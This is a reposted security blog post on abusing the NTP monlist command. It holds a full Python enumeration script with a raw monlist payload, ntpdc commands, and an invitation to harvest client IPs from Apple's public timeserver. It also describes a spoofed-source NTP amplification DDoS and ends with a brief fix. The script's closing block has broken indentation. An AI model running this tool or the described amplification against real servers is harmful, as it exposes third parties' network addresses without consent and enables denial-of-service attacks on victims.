Using NTP to Enumerate Client IPs

轉自：https://www.securepla.net/using-ntp-to-enumerate-client-ips/ 

惋惜我如今沒時間學習python，代碼看不懂，悲劇！

 

THE NTP ISSUE [PDF Version Here]

The buzz around the internets lately has been about NTP. Security researchers, such as HD Moore, have been doing extensive investigation on the 「features」 of NTP. HD Moore discovered that, by default, NTP servers allow you to query them for additional information. Some of the basic queries were listpeers, show peers, peers, sysstat, and most important monlist.

Monlist is used as a diagnostic tool to provide the user the last 600 IP addresses of clients who queried that NTP server. What does this mean? This means with a single request, you can get a good feel of all the IPs in a network. Also, if there is an NTP server in the DMZ, an external attacker could potentially get the internal IPs.

FYI: I haven’t been successful with attacking Windows version of NTP.

SO WHAT’S THE TRICK:

You can install the NTP client on your favorite nix and run:

ntpdc -n -c monlist <ip address>

But this seems to only work half of the time. It seems as sometimes the sequence numbers get messed up and it crashes. You can use the new auxiliary tool from metasploit (ntp_monlist) or sensepost’s python tool, but both those have issues due to payloads that do not support version 3 of ntp. They only support version 2. The best tool is included called ntp_ip_enum.txt (click to view) which is a version of the sensepost script that I had modified the payloads allowing both NTP version 2 and version 3.

COMMAND: NTP_IP_ENUM.TXT

./ntp_ip_enum.py <ip_address of a NTP server> <optional another ip_address of a different NTP server>

When this is complete, an output file is created in the directory where the ntp_ip_enum script was run labeled NTP.txt. This will include the clients that have connected to that NTP server within the last 5 minutes or last 600 requests.

Give it a try:

./ntp_ip_enum.py time.euro.apple.com

This will give you a list of clients that have recently contacted Apple’s Europe timeserver. Wowzers!

SCRAPING THE INTERNETS NTP

MAPPING TIME.EURO.APPLE.COM

So I took the entire client IP’s listed from time.euro.apple.com and plotted them against Google earth. This gave us some interesting views on which countries use Apple laptops and which do not.

 

THE FIX

This could have all been averted by not allowing external users to query these types of commands. Monlist is usually used for debugging but should only be allowed locally.

ADDITIONAL ATTACKS

HD Moore also discussed that he had figured out a way to DDoS a system using NTP with very minimal requests. Although he has not released data on this type of DDoS, we put our heads together here on what the attack could be. When you make a monlist request, you send 1 udp packet to the NTP server and 600+ responses are returned. We think that using this request against all the NTP servers and peers, you could send hundreds of thousands of UDP packets to a victim with minimal request packets. By spoofing the source address and requesting monlists repetitively, all responses from those NTP servers will be forwarded to the victim.

 

 

#!/usr/bin/env python
"""
Basic script to pull addresses from a NTP server using the monlist command. Can also output Maltego resultset.

Gert Burger <gert A@T sensepost.com>
SensePost (Pty) Ltd
www.sensepost.com

This work is licensed under the Creative Commons Attribution 2.5 South Africa License available at http://creativecommons.org/licenses/by/2.5/za/

Edited by SECUREPLA.NET
"""
from struct import unpack, pack
import socket
import select
import sys
import string

OUTPUT_FORMAT='normal'  #'maltego' for maltego xml or any other string for normal output
DEBUG=False             #Enables basic debug info
TIMEOUT=2               #Read timeout in seconds
TRIES=3                 #Number of times to do the monlist request
filename="NTP.txt"


def int_ip_to_str(ip_num):
    return socket.inet_ntoa(pack('!L', ip_num))

def str_ip_to_int(ip):
    return unpack('!L',socket.inet_aton(ip))

def get_payload():
    return """\x17\x00\x02\x2a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"""

def parse_monlist_packet(data):
    result = dict(response=False, more=False, error=None, records=[])

    if len(data) < 8:
        result['error'] = 'NO_HEADER'
        return result

    ntp_flags, ntp_auth, ntp_vers, ntp_req_code, num_items, item_size  = unpack('!BBBBHH', data[0:8])
    data = data[8:]

    result['response'] = ntp_flags & (1 << 7) > 0
    result['more'] = ntp_flags & (1 << 6) > 0

    if not result['response']: #Return if its a request
        result['error'] = "REQUEST_PACKET"
    elif ntp_req_code == 42: #Check if its a monlist packet
        if DEBUG: print "item_size[%s] \tnum_items[%s] \tlen(data)[%s]" % (item_size, num_items, len(data))

        if item_size != 32:
            result['error'] = "WRONG_ITEM_SIZE"
        elif num_items < 1:
            result['error'] = "WRONG_ITEM_COUNT"
        elif len(data) < num_items*item_size:
            result['error'] = "SHORT_PACKET"
        else:
            for offset in range(0, num_items*item_size, item_size):
                parts = unpack('!IIIIIIII', data[offset:offset+item_size])
                ip = int_ip_to_str(parts[4])
                port = parts[7]
                result['records'].append((ip, port))
    else:
        result['error'] = "WRONG_REQUEST_CODE"

    return result

def fetch(ntp_server, timeout=5):
    def send_payload(sock, target):
        data = get_payload()
        bytes_sent = sock.sendto(data, (target, 123))
        if bytes_sent != len(data) and DEBUG:
            print "Failed to send payload"

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.bind(('0.0.0.0', 0))

    send_payload(sock, ntp_server)

    results = set()
    count = 0
    while True:
        rlist, wlist, xlist = select.select([sock], [], [], TIMEOUT)
        if sock in rlist:
            data, addr = sock.recvfrom(1024)
            ret = parse_monlist_packet(data)
            if ret['error']:
                if DEBUG: print "Error parsing packet[%s]" % ret['error']
            else:
                results.update([x[0] for x in ret['records']])
        else:
            count += 1
            if count >= TRIES:
                break
            send_payload(sock, ntp_server)

    return list(results)


def print_maltego(results):
    from xml.dom.minidom import Document
    doc = Document()
    mm = doc.createElement('MaltegoMessage')
    doc.appendChild(mm)
    mtrm = doc.createElement('MaltegoTransformResponseMessage')
    mm.appendChild(mtrm)
    entities = doc.createElement('Entities')
    mtrm.appendChild(entities)

    for result in results:
        entity = doc.createElement('Entity')
        entity.setAttribute('Type', 'IPAddress')

        value = doc.createElement('Value')
        value_node = doc.createTextNode(result)

        value.appendChild(value_node)
        entity.appendChild(value)
        entities.appendChild(entity)

    output = doc.toxml()
    print output[output.index("<Maltego"):] # Hack to rip out <? xml ?> so that maltego can function


if __name__ == '__main__':
    if len(sys.argv) > 1:
        targets = sys.argv[1:]
    else:
        print "Usage: %s target ntp servers\n\nThis script will return a unique set of IP's obtained from the list of ntp servers via the monlist command" % sys.argv[0]
        sys.exit(-1)

    results = set()
    for target in targets:
        results.update(fetch(target))
    results = sorted(results, key=str_ip_to_int)

    if str(OUTPUT_FORMAT).lower() == 'maltego':
        print_maltego(results)
    else:
    FILE = open(filename,"a")
    FILE.writelines("-------------------------------NTP List------------------------------")
    FILE.writelines("\n")
    FILE.writelines("Target host: ")
    FILE.writelines(targets)
    FILE.writelines("\n")
    #print "\n".join(results)
    FILE.writelines("\n".join(results))
    FILE.writelines("\n")
    FILE.writelines("Number of results %s" % len(results))
    print "Completed.  Check NTP.txt"

#spidermark sensepostdata ntp_monlist.py